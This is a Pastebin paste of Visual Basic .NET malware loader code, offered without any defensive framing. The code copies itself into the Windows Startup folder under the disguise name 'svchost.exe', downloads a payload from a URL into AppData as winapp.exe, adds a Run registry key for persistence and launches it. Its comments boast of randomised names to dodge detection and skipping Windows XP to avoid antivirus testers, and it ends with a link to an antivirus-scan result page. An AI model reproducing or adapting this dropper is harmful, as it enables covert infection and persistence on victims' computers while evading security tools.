Advertisement
gay123

Barang Baik

May 9th, 2015
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.87 KB | None | 0 0
  1. 'Windows 7 startup User
  2. Try
  3. Dim file1 As String = Application.ExecutablePath
  4. Dim copy1 As String = "C:\Users\" + Environment.UserName.ToString + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
  5. If File.Exists(copy1) Then
  6. Else
  7. System.IO.File.Copy(file1, copy1)
  8. End If
  9. Catch ex As Exception
  10. End Try
  11.  
  12. 'Windows XP startup User
  13. Try
  14. Dim file1 As String = Application.ExecutablePath
  15. Dim copy1 As String = "C:\Documents and Settings\" + Environment.UserName.ToString + "\Start Menu\Programs\Startup\svchost.exe"
  16. If File.Exists(copy1) Then
  17. Else
  18. System.IO.File.Copy(file1, copy1)
  19. End If
  20. Catch ex As Exception
  21. End Try
  22. End Sub
  23.  
  24. Sub kipidap()
  25. 'all string names have been randomize for less detection(heard it helps)
  26. 'original string names are commented above the string
  27.  
  28. Try
  29. 'Link-------
  30. 'Sets the link to the direct file URL to download
  31. Dim dfg987dfg As String = (e)
  32.  
  33. 'path-------
  34. 'Sets the download file path to current user's appadata folder
  35. Dim sdfg9087dfg0987 As String = My.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData & ("\winapp.exe")
  36.  
  37. 'client------
  38. 'sets up a web client allowing you to download the file
  39. Dim fdbg8sdf7g09sd8f7g As WebClient = New WebClient()
  40.  
  41. 'key--------
  42. 'sets the registry key allowing you to set the exe for system startup
  43. Dim sdf9g87sdfg As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
  44.  
  45. 'osver------
  46. 'checks if the computer is running windows xp or lower, keeps Av companies that use XP to test peoples files from using this loader and your file
  47. Dim osVer As Version = Environment.OSVersion.Version
  48.  
  49. If osVer.Major >= 6 Then
  50. Try
  51. fdbg8sdf7g09sd8f7g.DownloadFile(dfg987dfg, sdfg9087dfg0987) 'downloads the file to path (appdata)
  52. Threading.Thread.Sleep(6000) 'sleeps for a few seconds
  53. sdf9g87sdfg.SetValue(sdfg9087dfg0987, True) 'sets the file to startup before executing incase your files detected after download
  54. Process.Start(sdfg9087dfg0987) 'starts your file (appdata & "winapp.exe")
  55. Me.Close()
  56.  
  57. Catch ex As Exception
  58.  
  59. End Try
  60. End If
  61. Catch ex As Exception
  62. End Try
  63. End Sub
  64.  
  65.  
  66. =======================================================
  67. http://www.refud.me/results.php?id=5d353ozfqt4qhqjqcg6q420g1tgk2zzkaon
  68. =======================================================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement